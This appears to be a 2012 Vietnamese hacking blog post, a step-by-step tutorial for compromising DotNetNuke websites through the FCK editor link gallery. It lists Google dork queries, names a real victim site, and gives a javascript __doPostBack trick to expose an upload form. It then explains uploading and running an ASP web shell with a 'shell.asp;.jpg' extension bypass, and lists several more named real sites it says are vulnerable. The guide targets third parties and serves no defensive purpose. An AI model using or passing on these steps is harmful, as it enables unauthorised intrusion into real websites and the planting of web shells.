Trang chủ » SQL Injection » TUTORIALS » Demo Hack Web Bằng Kỹ Thuật DNN (DotNet Nuke)

29 thg 6, 2012

Demo Hack Web Bằng Kỹ Thuật DNN (DotNet Nuke)

Bước 1: Sử dụng google để tìm site chứa lỗ hổng DNN
:inurl:/tabid/36/language/en-US/Default.aspx
Inurl:”/portals/0” 
Bước 2: Chọn  1 victim bất kỳ, ví dụ:
http://www.citedelajoiehaiti.org/tabid/36/language/vi-VN/Default.aspx
Bước 3: Thay thế đoạn url sau:
/tabid/36/language/en-US/Default.aspx
Bằng đoạn mã url:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Lúc đó, đường link của victim như sau:
http://www.citedelajoiehaiti.org/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Thông tin thu được:




 
Bước 4: Tích vào File (A File on your site)
     

Sau đó thay thế đường link  bằng đoạn mã Script đơn giản sau:
javascript:__doPostBack('ctlURL$cmdUpload','') 

Sau khi chạy địa chỉ url ở trên sẽ xuất hiện giao diện cho upload file
Bước 5: Upload shell
Click Browse và upload shell .asp or. aspx


Thêm 1 số kỹ thuật upload shell đối với asp,
- Có thể bypass đuôi file shell sang dạng ảnh như sau: shell.asp;.jpg.
- Hoặc sử dụng tool http live herder or tamper data….
Bước 6: Run shell
Path đường dẫn để http://www.victim.com.vn//portals/0/tên shell
Ví dụ: http://www.citedelajoiehaiti.org/portals/0/soleil.asp


 
Một số site dính DNN:
http://www.gydykla.lt/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.rotel.ch/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://southeastasiansea.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.guideassociation.org/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.yorkbest.info/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.gesunderlifestyle.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.seth.pt/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Nhãn: ,

Không có nhận xét nào:

Đăng nhận xét